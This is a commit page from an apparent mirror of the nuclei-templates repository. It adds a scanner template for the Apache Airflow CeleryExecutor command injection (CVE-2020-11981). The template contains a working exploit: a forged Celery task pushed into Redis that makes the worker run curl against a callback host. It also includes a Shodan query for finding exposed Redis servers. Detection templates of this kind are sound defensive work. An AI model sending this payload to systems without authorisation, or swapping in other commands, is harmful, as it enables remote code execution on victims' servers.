daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #7242 from projectdiscovery/pussycat0x-patch-6 

CVE-2020-11981
patch-1
Dhiyaneshwaran 2023-05-18 15:10:00 +05:30 committed by GitHub
parent f22475ff13 d9a02b0c53
commit 89ac9e63d6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 40 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
network/cves/2020/CVE-2020-11981.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2020-11981
info:
name: Apache Airflow <=1.10.10 - Command Injection
author: pussycat0x
severity: critical
description: |
An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
reference:
- https://github.com/apache/airflow/pull/9178
- https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981
metadata:
verified: "true"
shodan-query: product:"redis"
tags: network,redis,unauth,apache,airflow
variables:
data: "*3\r\n$5\r\nLPUSH\r\n$7\r\ndefault\r\n$936\r\n{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \""
encode1: '[[["curl", "http://'
encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]'
end: '"}'
tcp:
- inputs:
- data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r\n')}}"
read: 1024
host:
- "{{Hostname}}"
- "{{Host}}:6379"
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: curl"